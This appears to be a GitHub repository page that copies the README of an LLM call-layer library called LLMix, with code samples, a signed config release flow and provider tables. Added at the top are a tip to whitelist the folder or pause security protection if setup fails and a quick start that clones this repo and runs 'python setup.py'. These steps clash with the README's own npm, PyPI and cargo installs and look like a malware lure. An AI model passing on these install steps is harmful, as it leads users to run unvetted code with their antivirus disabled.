Skip to content

Souliuangular/llmix-968

LLMix

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.py

npm version PyPI crates.io Python 3.14+ TypeScript 5.0+ Rust 1.83+ License: Apache--2.0

Read in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी

Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.

LLMix is the layer between your product and the provider SDK.

It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.

The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.

That is the whole thing. Small layer. Sharp edges filed down.


Why It Exists

AI products in 2026 do not usually fail because one SDK call is hard.

They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.

LLMix is for that part of the system. The signal chain between your app and the model.

You still own the prompt. You still own the SDK. LLMix owns the harness.


TypeScript OpenAI-compatible helpers

Python Redis cache support

Rust OpenAI helper and Redis cache

cargo add llmix-rs --features providers-openai,redis


LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.

---

## Documentation

If you are new to LLMix, read in this order:

Other operations docs:

- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)

---

## At a Glance

![LLMix wraps your existing LLM SDK stack with MDA config, cache, resilience, and key-pool primitives.](docs/llmix/images/llmix-wraps-sdk.png)

LLMix wraps one provider call at a time.

It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.

---


### TypeScript

```typescript
import {
  CallPipeline,
  KeyPool,
  TwoTierCache,
  openaiDispatch,
} from "@snoai/llmix";

const pipeline = new CallPipeline({
  dispatch: openaiDispatch(),
  responseCache: new TwoTierCache("memory"),
});

pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));

const response = await pipeline.call({
  config: {
    provider: "openai",
    model: "gpt-4o-mini",
    common: { temperature: 0.2, maxOutputTokens: 512 },
    caching: { strategy: "memory" },
  },
  messages: [
    { role: "user", content: "Explain LLMix in one sentence." },
  ],
});

console.log(response.content);
await pipeline.close();

Python

import asyncio
import os

from llmix import (
    CallInput,
    CallPipeline,
    KeyPool,
    PipelineConfig,
    TwoTierCache,
    openai_dispatch,
)


async def main() -> None:
    pipeline = CallPipeline(
        PipelineConfig(
            dispatch=openai_dispatch(),
            response_cache=TwoTierCache("memory"),
        )
    )

    pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))

    response = await pipeline.call(
        CallInput(
            config={
                "provider": "openai",
                "model": "gpt-4o-mini",
                "common": {"temperature": 0.2, "max_output_tokens": 512},
                "caching": {"strategy": "memory"},
            },
            messages=[
                {"role": "user", "content": "Explain LLMix in one sentence."}
            ],
        )
    )

    print(response.content)
    await pipeline.close()


asyncio.run(main())

Rust

Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.

[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }
use llmix_rs::{
    load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;

let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);

let response = pipeline
    .call(CallInput {
        config: json!({
            "provider": "openai",
            "model": "gpt-4o-mini",
            "common": { "temperature": 0.2, "max_output_tokens": 512 },
            "caching": { "strategy": "memory" }
        }),
        messages: vec![json!({
            "role": "user",
            "content": "Explain LLMix in one sentence."
        })],
        singleflight_key: None,
    })
    .await;

See the Rust guide for full main examples and feature flags.


What You Get Around Every Call

LLMix request pipeline from config and cache lookup through circuit breaker, singleflight, key-pool rotation, retry loop, dispatch, and telemetry.

Concern What LLMix does
Response cache L1 memory plus optional Redis L2, with cross-runtime canonical cache keys
Key pools Round-robin key selection, 429 rotation, and 401/403 dead-key eviction
Retries Jittered exponential backoff, with Retry-After honored
Circuit breaker Scoped by provider and effective base URL
Singleflight Collapses identical concurrent work into one upstream request
Concurrency AIMD adaptive semaphore, driven by rate-limit feedback
Provider kwargs Common config becomes provider-specific request fields
Thinking tokens Optional <think> extraction into normalized response objects
Registry Signed compiled config registry with one live current.json pointer

The defaults are meant to be boring. Tune them when real traffic gives you a reason.


MDA Presets

LLMix turns editable MDA presets into a signed compiled registry release opened through the official flow.

LLMix uses MDA as the source format for model presets. Human notes and runtime settings live in one file. Production services read the compiled registry, not the mutable source tree. Python, TypeScript, and Rust can require MDA integrity, requires.network, and verifier-hook based signatures while loading or publishing registry output. Real Rekor transport and Sigstore cryptography are supplied by caller-provided clients/verifiers.

The examples below use this preset path:

config/llm/source/search_summary/openai_fast.mda
---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
  snoai-llmix:
    common:
      provider: openai
      model: gpt-5-mini
      temperature: 0.2
      maxOutputTokens: 512
    caching:
      strategy: redis-or-memory
    providerOptions:
      openai:
        reasoningEffort: medium
---
# openai_fast

Summarize search results for a research workflow.

Load it directly when editing or testing a preset:

import { loadMdaConfig } from "@snoai/llmix";

const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");
from llmix import load_mda_config

config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")
use llmix_rs::load_config;

let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;

For production services, use the registry.


Config Registry

Use this layout. Treat it as the public contract:

config/llm/
  source/
    <module>/
      <preset>.mda
  current.json
  compiled/

source/ is edited by people. current.json and compiled/ are generated by LLMix. Store the trust anchor outside config/llm.

The release flow is:

prepare steps. The did:web example assumes these release-identity inputs already exist outside config/llm: release/did-web-private-key.pem and release/did.json. Provide them from your release system or use the GitHub Actions Sigstore/Rekor profile instead.

mkdir -p config/llm/source/search_summary release deploy

mda init --template llmix-preset \
  --module search_summary \
  --preset openai_fast \
  --provider openai \
  --model gpt-5-mini \
  --out config/llm/source/search_summary/openai_fast.mda

mda validate config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --json

mda integrity compute config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --write \
  --json

mda release trust policy \
  --target llmix-registry \
  --profile did-web \
  --domain config.example.com \
  --out release/trust-policy.json \
  --json

mda sign config/llm/source/search_summary/openai_fast.mda \
  --profile did-web \
  --did did:web:config.example.com \
  --key-id did:web:config.example.com#release \
  --key-file release/did-web-private-key.pem \
  --in-place \
  --json

mda verify config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --json

mda release prepare \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --out release/plan.json \
  --json
llmix publish-registry \
  --root config/llm \
  --release-plan release/plan.json \
  --revision 2026-05-14T000000Z \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --root-did did:web:config.example.com \
  --root-key-id did:web:config.example.com#release \
  --root-key-file release/did-web-private-key.pem \
  --json

mda release finalize \
  --target llmix-registry \
  --registry-dir config/llm \
  --registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
  --release-plan release/plan.json \
  --policy release/trust-policy.json \
  --derive-root-digest \
  --minimum-revision 2026-05-14T000000Z \
  --out deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

mda doctor release \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --release-plan release/plan.json \
  --manifest deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

llmix check-registry \
  --root config/llm \
  --trust deploy/llmix-trust.json \
  --preset search_summary/openai_fast \
  --did-document release/did.json \
  --tamper-proof \
  --json

Runtime code opens the generated registry with the external trust anchor:

import {
  ConfigRegistryManager,
  loadLlmixTrustManifest,
  registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";

const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
  signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");

didWebVerifier is the app verifier hook required by this did:web policy. For a command-line runtime proof, use llmix check-registry --did-document release/did.json; in app code, pass the verifier hooks required by your trust policy.

Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.

ConfigRegistryPublisher is still available for advanced release systems, but the default public path is the llmix publish-registry command. Do not write a project-local registry compiler.


Provider Coverage

The public dispatch helpers cover the providers we actually test.

Provider Python TypeScript Notes
OpenAI openai_dispatch openaiDispatch OpenAI Responses and chat-style flows
Anthropic anthropic_dispatch anthropicDispatch Messages API, thinking budget validation
Gemini gemini_dispatch geminiDispatch Google GenAI-compatible params
OpenRouter openrouter_dispatch openrouterDispatch OpenAI-compatible
DeepInfra deepinfra_dispatch deepinfraDispatch OpenAI-compatible
Novita novita_dispatch novitaDispatch OpenAI-compatible
Together together_dispatch togetherDispatch OpenAI-compatible
Sno GPU sno_gpu_dispatch snoGpuDispatch On-prem OpenAI-compatible GPU endpoints

Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.

OpenAI-compatible providers reuse the OpenAI request shape with provider-specific base_url handling. That keeps the contract plain. Plain is useful.


Environment Variables

Variable Purpose
OPENAI_API_KEY / OPENAI_KEYS OpenAI key or comma-separated key pool
ANTHROPIC_API_KEY / ANTHROPIC_KEYS Anthropic key or comma-separated key pool
GEMINI_API_KEY / GEMINI_KEYS Gemini key or comma-separated key pool
OPENROUTER_API_KEY / OPENROUTER_KEYS OpenRouter key or comma-separated key pool
DEEPINFRA_API_KEY / DEEPINFRA_KEYS DeepInfra key or comma-separated key pool
TOGETHER_API_KEY / TOGETHER_KEYS Together key or comma-separated key pool
NOVITA_API_KEY / NOVITA_KEYS Novita key or comma-separated key pool
SNO_LLM_API_KEY Sno GPU direct dispatcher fallback
SNO_GPU_API_KEY / SNO_GPU_KEYS Sno GPU key-pool variables for provider id sno-gpu
GPU_BASE_URL Sno GPU base URL
REDIS_URL Redis response-cache URL
LLMIX_STATE_DIR Lock files, batch metadata, and kill-switch state

load_keys_from_env("provider-name") checks PROVIDER_NAME_KEYS first, then PROVIDER_NAME_API_KEY. Dashes become underscores.


What This Is Not

  • Not a streaming framework. Streaming stays with your SDK.
  • Not a prompt framework. Bring your own prompt layer.
  • Not a provider marketplace. One call uses the provider named by its config.
  • Not a reason to hide every model decision behind indirection. Some things should stay in code.

LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.


Development

# Full monorepo checks
bun run build
bun run check
bun run test

License

Apache-2.0

Related

About

Production LLM call layer for AI agents and tools: keep OpenAI/Anthropic/AI SDK/LiteLLM, hot-swap models with MDA presets, and add cache, retries, circuit breakers, key rotation, singleflight, and Python/TypeScript/Rust parity.

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages